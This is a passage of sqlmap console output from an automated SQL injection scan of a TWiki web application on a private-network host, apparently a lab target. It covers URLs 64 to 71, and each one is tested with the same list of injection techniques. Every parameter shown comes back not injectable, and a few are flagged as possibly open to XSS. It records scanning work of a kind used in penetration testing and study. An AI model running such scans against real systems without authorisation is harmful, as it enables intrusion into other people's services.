[18:53:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:53:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:53:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:53:04] [INFO] testing 'MySQL inline queries'
[18:53:04] [INFO] testing 'PostgreSQL inline queries'
[18:53:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:53:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:53:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:53:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:53:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:53:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:53:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:53:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:53:08] [INFO] testing 'Oracle AND time-based blind'
[18:53:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:53:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:53:22] [WARNING] GET parameter 'param2' is not injectable
[18:53:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 64:
GET http://192.168.1.113:80/twiki/bin/edit/Main/MartinRaabe?topicparent=TWiki.TWikiDocumentation
do you want to test this URL? [Y/n/q]
> Y
[18:53:22] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/MartinRaabe?topicparent=TWiki.TWikiDocumentation'
[18:53:22] [INFO] testing connection to the target URL
[18:53:23] [INFO] testing if the target URL is stable
[18:53:24] [INFO] target URL is stable
[18:53:24] [INFO] testing if GET parameter 'topicparent' is dynamic
[18:53:24] [WARNING] GET parameter 'topicparent' does not appear dynamic
[18:53:24] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[18:53:24] [INFO] testing for SQL injection on GET parameter 'topicparent'
[18:53:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:53:24] [WARNING] reflective value(s) found and filtering out
[18:53:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:53:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:53:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:53:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:53:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:53:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:53:27] [INFO] testing 'MySQL inline queries'
[18:53:27] [INFO] testing 'PostgreSQL inline queries'
[18:53:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:53:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:53:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:53:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:53:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:53:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:53:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:53:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:53:30] [INFO] testing 'Oracle AND time-based blind'
[18:53:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:53:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:53:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:53:41] [WARNING] GET parameter 'topicparent' is not injectable
[18:53:41] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 65:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.TWikiDocumentation
do you want to test this URL? [Y/n/q]
> Y
[18:53:41] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.TWikiDocumentation'
[18:53:41] [INFO] testing connection to the target URL
[18:53:42] [INFO] testing if the target URL is stable
[18:53:42] [INFO] target URL is stable
[18:53:42] [INFO] testing if GET parameter 'topicparent' is dynamic
[18:53:43] [WARNING] GET parameter 'topicparent' does not appear dynamic
[18:53:43] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[18:53:43] [INFO] testing for SQL injection on GET parameter 'topicparent'
[18:53:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:53:43] [WARNING] reflective value(s) found and filtering out
[18:53:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:53:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:53:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:53:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:53:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:53:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:53:46] [INFO] testing 'MySQL inline queries'
[18:53:46] [INFO] testing 'PostgreSQL inline queries'
[18:53:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:53:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:53:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:53:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:53:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:53:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:53:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:53:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:53:49] [INFO] testing 'Oracle AND time-based blind'
[18:53:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:53:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:53:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:54:00] [WARNING] GET parameter 'topicparent' is not injectable
[18:54:00] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 66:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/NotExistingYet?topicparent=TWiki.TWikiDocumentation
do you want to test this URL? [Y/n/q]
> Y
[18:54:00] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/NotExistingYet?topicparent=TWiki.TWikiDocumentation'
[18:54:00] [INFO] testing connection to the target URL
[18:54:01] [INFO] testing if the target URL is stable
[18:54:02] [INFO] target URL is stable
[18:54:02] [INFO] testing if GET parameter 'topicparent' is dynamic
[18:54:02] [WARNING] GET parameter 'topicparent' does not appear dynamic
[18:54:02] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[18:54:02] [INFO] testing for SQL injection on GET parameter 'topicparent'
[18:54:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:54:02] [WARNING] reflective value(s) found and filtering out
[18:54:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:54:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:54:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:54:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:54:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:54:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:54:05] [INFO] testing 'MySQL inline queries'
[18:54:05] [INFO] testing 'PostgreSQL inline queries'
[18:54:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:54:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:54:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:54:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:54:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:54:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:54:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:54:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:54:08] [INFO] testing 'Oracle AND time-based blind'
[18:54:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:54:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:54:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:54:19] [WARNING] GET parameter 'topicparent' is not injectable
[18:54:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 67:
GET http://192.168.1.113:80/twiki/bin/viewfile/TWiki/FileAttachment?rev=&filename=Sample.txt
do you want to test this URL? [Y/n/q]
> Y
[18:54:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/viewfile/TWiki/FileAttachment?rev=&filename=Sample.txt'
[18:54:19] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/pub/TWiki/FileAttachment/Sample.txt'. Do you want to follow? [Y/n] Y
[18:54:19] [INFO] heuristics detected web page charset 'ascii'
[18:54:20] [INFO] testing if the target URL is stable
[18:54:20] [WARNING] GET parameter 'rev' does not appear dynamic
[18:54:21] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:54:21] [INFO] testing for SQL injection on GET parameter 'rev'
[18:54:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:54:21] [WARNING] reflective value(s) found and filtering out
[18:54:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:54:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:54:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:54:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:54:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:54:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:54:23] [INFO] testing 'MySQL inline queries'
[18:54:24] [INFO] testing 'PostgreSQL inline queries'
[18:54:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:54:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:54:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:54:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:54:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:54:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:54:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:54:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:54:26] [INFO] testing 'Oracle AND time-based blind'
[18:54:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:54:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:54:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:54:36] [WARNING] GET parameter 'rev' is not injectable
[18:54:36] [WARNING] GET parameter 'filename' does not appear dynamic
[18:54:37] [WARNING] heuristic (basic) test shows that GET parameter 'filename' might not be injectable
[18:54:37] [INFO] testing for SQL injection on GET parameter 'filename'
[18:54:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:54:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:54:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:54:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:54:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:54:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:54:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:54:40] [INFO] testing 'MySQL inline queries'
[18:54:40] [INFO] testing 'PostgreSQL inline queries'
[18:54:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:54:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:54:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:54:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:54:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:54:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:54:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:54:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:54:43] [INFO] testing 'Oracle AND time-based blind'
[18:54:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:54:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:54:52] [WARNING] GET parameter 'filename' is not injectable
[18:54:52] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 68:
GET http://192.168.1.113:80/twiki/bin/attach/TWiki/FileAttachment?filename=Sample.txt&revInfo=1
do you want to test this URL? [Y/n/q]
> Y
[18:54:52] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/attach/TWiki/FileAttachment?filename=Sample.txt&revInfo=1'
[18:54:52] [INFO] testing connection to the target URL
[18:54:53] [INFO] testing if the target URL is stable
[18:54:53] [INFO] target URL is stable
[18:54:53] [INFO] testing if GET parameter 'filename' is dynamic
[18:54:53] [WARNING] GET parameter 'filename' does not appear dynamic
[18:54:54] [WARNING] heuristic (basic) test shows that GET parameter 'filename' might not be injectable
[18:54:54] [INFO] heuristic (XSS) test shows that GET parameter 'filename' might be vulnerable to XSS attacks
[18:54:54] [INFO] testing for SQL injection on GET parameter 'filename'
[18:54:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:54:54] [WARNING] reflective value(s) found and filtering out
[18:54:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:54:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:54:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:54:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:54:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:54:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:54:58] [INFO] testing 'MySQL inline queries'
[18:54:58] [INFO] testing 'PostgreSQL inline queries'
[18:54:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:54:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:54:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:54:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:54:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:55:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:55:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:55:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:55:01] [INFO] testing 'Oracle AND time-based blind'
[18:55:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:55:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:55:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:55:14] [WARNING] GET parameter 'filename' is not injectable
[18:55:14] [INFO] testing if GET parameter 'revInfo' is dynamic
[18:55:14] [WARNING] GET parameter 'revInfo' does not appear dynamic
[18:55:14] [WARNING] heuristic (basic) test shows that GET parameter 'revInfo' might not be injectable
[18:55:15] [INFO] testing for SQL injection on GET parameter 'revInfo'
[18:55:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:55:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:55:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:55:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:55:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:55:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:55:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:55:18] [INFO] testing 'MySQL inline queries'
[18:55:18] [INFO] testing 'PostgreSQL inline queries'
[18:55:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:55:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:55:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:55:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:55:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:55:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:55:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:55:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:55:21] [INFO] testing 'Oracle AND time-based blind'
[18:55:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:55:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:55:33] [WARNING] GET parameter 'revInfo' is not injectable
[18:55:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:55:33] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/attach/TWiki/FileAttachment?filename=Smile.gif&revInfo=1'
URL 69:
GET http://192.168.1.113:80/twiki/bin/viewfile/TWiki/TWiki/FileAttachment?rev=&filename=Sample.txt
do you want to test this URL? [Y/n/q]
> Y
[18:55:33] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/viewfile/TWiki/TWiki/FileAttachment?rev=&filename=Sample.txt'
[18:55:33] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/bin/oops/TWiki/TWiki/FileAttachment'. Do you want to follow? [Y/n] Y
[18:55:34] [INFO] testing if the target URL is stable
[18:55:35] [WARNING] GET parameter 'rev' does not appear dynamic
[18:55:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:55:35] [INFO] testing for SQL injection on GET parameter 'rev'
[18:55:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:55:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:55:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:55:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:55:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:55:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:55:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:55:41] [INFO] testing 'MySQL inline queries'
[18:55:41] [INFO] testing 'PostgreSQL inline queries'
[18:55:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:55:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:55:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:55:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:55:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:55:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:55:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:55:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:55:46] [INFO] testing 'Oracle AND time-based blind'
[18:55:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:55:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:55:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:56:06] [WARNING] GET parameter 'rev' is not injectable
[18:56:06] [WARNING] GET parameter 'filename' does not appear dynamic
[18:56:06] [WARNING] heuristic (basic) test shows that GET parameter 'filename' might not be injectable
[18:56:06] [INFO] testing for SQL injection on GET parameter 'filename'
[18:56:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:56:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:56:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:56:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:56:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:56:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:56:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:56:12] [INFO] testing 'MySQL inline queries'
[18:56:12] [INFO] testing 'PostgreSQL inline queries'
[18:56:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:56:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:56:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:56:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:56:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:56:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:56:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:56:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:56:17] [INFO] testing 'Oracle AND time-based blind'
[18:56:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:56:27] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:56:37] [WARNING] GET parameter 'filename' is not injectable
[18:56:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:56:37] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/viewfile/TWiki/FileAttachment?rev=1.1&filename=Sample.txt'
URL 70:
GET http://192.168.1.113:80/twiki/bin/rename/TWiki/FileAttachment?attachment=Sample.txt
do you want to test this URL? [Y/n/q]
> Y
[18:56:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/TWiki/FileAttachment?attachment=Sample.txt'
[18:56:37] [INFO] testing connection to the target URL
[18:56:37] [INFO] testing if the target URL is stable
[18:56:38] [INFO] target URL is stable
[18:56:38] [INFO] testing if GET parameter 'attachment' is dynamic
[18:56:38] [WARNING] GET parameter 'attachment' does not appear dynamic
[18:56:38] [WARNING] heuristic (basic) test shows that GET parameter 'attachment' might not be injectable
[18:56:38] [INFO] heuristic (XSS) test shows that GET parameter 'attachment' might be vulnerable to XSS attacks
[18:56:38] [INFO] testing for SQL injection on GET parameter 'attachment'
[18:56:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:56:38] [WARNING] reflective value(s) found and filtering out
[18:56:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:56:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:56:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:56:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:56:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:56:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:56:42] [INFO] testing 'MySQL inline queries'
[18:56:42] [INFO] testing 'PostgreSQL inline queries'
[18:56:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:56:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:56:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:56:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:56:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:56:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:56:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:56:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:56:45] [INFO] testing 'Oracle AND time-based blind'
[18:56:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:56:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:56:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:56:58] [WARNING] GET parameter 'attachment' is not injectable
[18:56:58] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 71:
GET http://192.168.1.113/twiki/bin/view/TWiki/TWikiSkins?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:56:58] [INFO] testing URL 'http://192.168.1.113/twiki/bin/view/TWiki/TWikiSkins?skin=print'
[18:56:58] [INFO] testing connection to the target URL
[18:56:58] [INFO] testing if the target URL is stable
[18:56:59] [INFO] target URL is stable
[18:56:59] [INFO] testing if GET parameter 'skin' is dynamic
[18:56:59] [INFO] confirming that GET parameter 'skin' is dynamic
[18:56:59] [INFO] GET parameter 'skin' is dynamic
[18:56:59] [INFO] heuristics detected web page charset 'ascii'
[18:56:59] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:56:59] [INFO] testing for SQL injection on GET parameter 'skin'
[18:56:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:56:59] [WARNING] reflective value(s) found and filtering out
[18:57:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:57:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:57:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:57:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:57:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:57:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:57:03] [INFO] testing 'MySQL inline queries'
[18:57:03] [INFO] testing 'PostgreSQL inline queries'
[18:57:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
